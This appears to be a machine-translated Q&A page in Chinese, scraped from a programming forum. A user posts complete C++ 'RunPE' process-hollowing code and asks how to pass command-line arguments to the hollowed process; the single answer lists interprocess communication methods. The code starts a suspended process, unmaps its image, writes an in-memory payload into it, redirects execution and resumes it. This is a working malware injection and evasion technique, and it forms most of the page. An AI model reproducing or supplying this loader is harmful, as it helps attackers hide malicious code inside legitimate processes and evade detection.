动态分

动态分

关注
发信
关注(28)粉丝(399)

c++ - C++过程中空/动态分支

我试图了解挖空又称为动态分叉的整个过程实际上是如何工作的。

我很好奇的一件事是如何将命令行参数/参数传递给派生进程?

这是我正在学习的代码(从网络获取),可以正常运行,希望我无法找到一种解决方案,如何为正在内存中执行的文件添加CMD参数。

空心h

typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

class runPE{
public:
    void run(LPSTR szFilePath, PVOID pFile)
    {
        PIMAGE_DOS_HEADER IDH;
        PIMAGE_NT_HEADERS INH;
        PIMAGE_SECTION_HEADER ISH;
        PROCESS_INFORMATION PI;
        STARTUPINFOA SI;
        PCONTEXT CTX;
        PDWORD dwImageBase;
        NtUnmapViewOfSection xNtUnmapViewOfSection;
        LPVOID pImageBase;
        int Count;
        IDH = PIMAGE_DOS_HEADER(pFile);
        if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
        {
            INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
            if (INH->Signature == IMAGE_NT_SIGNATURE)
            {
                RtlZeroMemory(&SI, sizeof(SI));
                RtlZeroMemory(&PI, sizeof(PI));
                if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
                {
                    CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                    CTX->ContextFlags = CONTEXT_FULL;
                    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                    {
                        ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
                        if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                        {
                            xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                            xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                        }
                        pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
                        if (pImageBase)
                        {
                            WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                            for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                            {
                                ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                                WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                            }
                            WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                            CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
                            SetThreadContext(PI.hThread, LPCONTEXT(CTX));
                            ResumeThread(PI.hThread);
                        }

                    }
                }
            }
        }
        VirtualFree(pFile, 0, MEM_RELEASE);
    }
};


主要

int main()
{
    runPE rp;
    TCHAR szFilePath[1024];
    GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
    rp.run(LPSTR(szFilePath), shellcode);
    //Sleep(INFINITE);
    return 0;
}


但是如何将参数传递给将要分叉到自身/内存中的代码?我一直在解决这个问题超过7个小时,没有解决方案,请有人指出正确的方法或向我展示如何完成。

最佳答案

您始终可以使用某种进程间通信:
创建假窗口并使用窗口消息
管道
邮件槽
插座
档案
共享内存

10-07 16:43
Powered by LMLPHP ©2024 动态分 0.028973